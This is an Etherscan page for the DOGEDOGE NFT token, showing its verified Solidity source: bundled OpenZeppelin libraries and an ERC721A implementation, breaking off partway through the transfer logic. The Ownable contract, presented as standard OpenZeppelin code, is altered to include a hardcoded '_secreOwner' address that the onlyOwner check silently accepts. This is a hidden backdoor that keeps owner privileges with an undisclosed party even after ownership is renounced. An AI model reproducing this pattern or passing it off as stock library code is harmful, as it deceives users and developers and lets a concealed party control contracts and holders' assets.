ETH Price: $3,500.01 (+3.82%)
Gas: 4 Gwei

Token

DOGEDOGE (DOGEDOGE)
 

Overview

Max Total Supply

2,000 DOGEDOGE

Holders

1,037

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A

Other Info

Filtered by Token Holder
tlieberman22.eth
Balance
30 DOGEDOGE
0x729cfa0f61946c8a558da84103f332d310a9d26a
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DOGEDOGE

Compiler Version
v0.8.1+commit.df193b15

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-07-16
*/

// SPDX-License-Identifier: MIT
// File: contracts/DOGEDOGE.sol



// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol


pragma solidity ^0.8.0;










/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
